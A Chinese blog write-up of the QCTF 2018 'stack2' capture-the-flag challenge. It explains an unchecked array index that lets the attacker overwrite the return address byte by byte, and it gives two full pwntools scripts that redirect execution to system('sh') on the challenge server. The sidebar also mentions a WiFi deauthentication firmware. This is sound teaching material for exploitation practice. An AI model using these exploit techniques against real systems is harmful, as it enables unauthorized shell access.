pwn CTF 4th-QCTF-2018 stack2

最新推荐文章于 2023-08-30 11:08:17 发布
最新推荐文章于 2023-08-30 11:08:17 发布
阅读量3.3k 收藏 6
点赞数 2
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/86600053
版权

先把程序跑一遍看看·~~~~~~~

然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~

 然后我们

咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida

这里好像没有什么毛病  限制了 输入的数量是99

然后往下看  

这里就是bug了    因为我们没有检查v13数组的边界 这里我们可以随意输入  然后劫持程序eip  

然后观察 哪里有system_addr   就ok了 但是 这里输入的是数字 好像有点麻烦

因为v13 是char 类型的数组 然后我们试着输入一下 

然后 去 栈 会发现 

这里其实应该能够注意得到  栈是小段模式  那么我们输入的时候 可以是 反着来  比如地址是 12345678  先输入78 45 34  12  

才能返回 正确的地址 然后 我们观察一下 哪里有我们system 的地址    

然后我们发现 本次(这个是会变化的  注意是我这次 运行的) 我们的返回地址FFCF77AC  而我们输入的地址是   FFCF7728  

那么偏移就是 0x84  然后之后我们找到 system_addr 就ok了  

然后就找到了  system_addr  

但是感觉这里/bin/bash 有点怪怪的啊~~~

先不管 我们试试 

 

#!/usr/bin/python
#coding:utf-8
 
from pwn import*

	



 
system_addr=0x080485AF
leave_offset=0x84


def write_addr(addr,va):
	io.sendline("3")
	io.recvuntil("which number to change:\n")
	io.sendline(str(addr))
	io.recvuntil("new number:\n")
	io.sendline(str(va))
	io.recvuntil("5. exit\n")

io=remote('111.198.29.45','31725')
io.recvuntil("How many numbers you have:\n")
io.sendline("1")
io.recvuntil("Give me your numbers\n")
io.sendline("1")
io.recvuntil("5. exit\n")


# write  system_addr

write_addr(leave_offset,0XAF)
write_addr(leave_offset+1,0X85)
write_addr(leave_offset+2,0X04)
write_addr(leave_offset+3,0X08)



io.sendline("5")
io.interactive()

如果你认为 到这就成功了  那就证明 你和我一样的单纯~~~~~~~~~~~~~~~~~~~~

竟然报错了 

纳尼??????????  本来我喜滋滋的准备cat flag 的  没有看到   没有找到那句话。。。。why??

/bin/bash 没有找到? ???????????????   emmmmmmmmmmmmmmmmmmmmmmm

有些奇怪 难道是 要/bin/sh???  按道理说 不应该啊  

然后我 就 无耻的翻了一下题解。。。。。。。。。。。。

这是官方放出的官方题解  https://www.xctf.org.cn/library/details/8723e039db0164e2f7345a12d2edd2a5e800adf7/

然后 这句话 亮了 

但是出题人在搭建docker环境时未注意,环境中只给了sh 

额   这个  emmmmm 比较可惜啊

没有办法  只能写入sh 了   值得一说的是   不能用原先的那个函数 

只能用本来的system  可以我们自己填参数的  

  

就是这个 

 这个也比较简单 直接放出exp

#!/usr/bin/python
#coding:utf-8
 
from pwn import*

	



 
system_addr=0x080485AF
leave_offset=0x84


def write_addr(addr,va):
	io.sendline("3")
	io.recvuntil("which number to change:\n")
	io.sendline(str(addr))
	io.recvuntil("new number:\n")
	io.sendline(str(va))
	io.recvuntil("5. exit\n")

io=remote('111.198.29.45','31725')
io.recvuntil("How many numbers you have:\n")
io.sendline("1")
io.recvuntil("Give me your numbers\n")
io.sendline("1")
io.recvuntil("5. exit\n")


# write  system_addr  0x08048450

write_addr(leave_offset,0X50)
write_addr(leave_offset+1,0X84)
write_addr(leave_offset+2,0X04)
write_addr(leave_offset+3,0X08)
# sh_addr  0x08048987
leave_offset+=8
print leave_offset
write_addr(leave_offset,0x87)
write_addr(leave_offset+1,0X89)
write_addr(leave_offset+2,0X04)
write_addr(leave_offset+3,0X08)

io.sendline("5")
io.interactive()

 

 

pipixia233333
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 24
    评论
专栏目录
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]rci 下载rci文件 思路 老规矩使用file和checksec查看文件 全保! 程序可以执行两次system,第一次执行的时候在sh的工作目录位于/tmp下一个随机的文件夹,用 ls -t来将最近生成的文件夹排序,后面输入文件路径时,用刚才得到的文件夹列表来尝试 nc连
QCTF2018stack2------<ASLR保护机制>
qq_21746331的博客
12-27 463
QCTF2018_stack2前言知识点详解0x1 ASLR保护机制writeupexp 前言 在最简单的栈溢出中,如果程序中存在获取shell的后门函数,则只需要简单的通过溢出手段将函数的返回地址修改为后门函数的地址,便可以轻松获取shell。而对于没有提供后门函数的程序,可以通过往栈里面写入shellcode,在返回的时候将控制流劫持到栈里面的shellcode获取shell。但是对于加入NX保护的程序,在栈中写入shellcode的方法则不再适用,而ROP就是其中一种绕过保护的手段。ROP的全称为R
qctf2018_stack2
qq_62887641的博客
08-30 60
然后本题坑点来了,他不是正常的开辟栈空间,如果是正常的话。有后门函数(不能用,出题人没有配置。ASLR保护机制使低4位仍是固定的。他每次只能改一个字节,一位一位改。数组没有检测边界,存在溢出。环境,但是又能用一点点。环境我们需要rop一下。
qctf2018_stack2(数组越界,偏移寻找)
m0_51251108的博客
11-12 728
qctf2018_stack2: 程序分析: 漏洞出现在change这里,没有对v5作边界检查,我们能造成越界,直接读数到ret地址 后门函数: 两个小trick: 1.我们都会以为偏移是0x70+4,而实际却是0x84 跟着这位师傅的文章调试: https://zhuanlan.zhihu.com/p/301091515 首先ida找到首次出现v13的地方,可以看到在for循环里 我们接着看这部分的Text view 断点下在0x80486ae,得到v13真实地址为0xffffd028 继续调
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctfpwn题char的libc库文件
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF-pwn]——qctf2018_stack2
Y_peak的博客
04-02 346
[BUUCTF-pwn]——qctf2018_stack2 这道题注意一点v3的类型就好, 其他应该木有什么可以说的吧, 它是char*类型., 也就是每个我们赋值的v7只有低位的一个字节可以写进去 漏洞就在这里, 可以利用这里, 以v3为基准修改任意地址的数据. 还有一点需要注意的是偏移, 我最一开始写的时候, 想当然写成了0x40+4 主要原因是因为画圈的位置改变了esp, 懒得看汇编往上面找了直接动态调试. 第一次执行该汇编的时候, eax就是我们开始输入的位置 然后直接定位到retn看栈顶
[BUUCTF]PWN——qctf2018_stack2
mcmuyanga的博客
04-12 546
qctf2018_stack2 例行检查 ,32位程序,开启了canary和nx保护 本地运行一下,看看大概的情况 32位ida载入,检索字符串发现了后门 main函数太长了,贴一下关键部分,漏洞点在修改v13数组里的值。 利用数组越界漏洞去修改ret,将ret修改成backdoor即可。 一开始我想当然的认为偏移是0x70+4,但是实际利用的时候发现不对。动调找一下吧 我输入的数据是12,存储在了0xffffcf38处,v13数组的地址 找一下函数结束的时候esp的地址 相差0
CTFpwn的入门指南
热门推荐
菜的只能随便写写博客
09-13 3万+
CTFpwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言...
CTF-PWN学习-为缺少指导的同学而生
yuwoxinanA3的博客
05-11 9198
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
CTF总结-PWN
qq_42747131的博客
05-14 6678
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
CTF PWN基础知识(寄存器、栈、汇编指令、标志位)详解
weixin_43780092的博客
09-04 4822
本文详解PWN中基础知识,文中寄存器缩写都有标注上中文含义,方便初学者理解记忆。
CTF中的PWN——无安全防护(栈溢出)
壊壊的诱惑你的博客
09-20 2425
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTFPWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
XCTF 4th-QCTF-2018 pwn stack2 writeup
qq_39596232的博客
08-30 835
题目描述: 暂无 分析思路: 1、首先拿到ELF文件,我们首先查看一下详细信息: tucker@ubuntu:~/pwn$ file stack2 stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 24
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值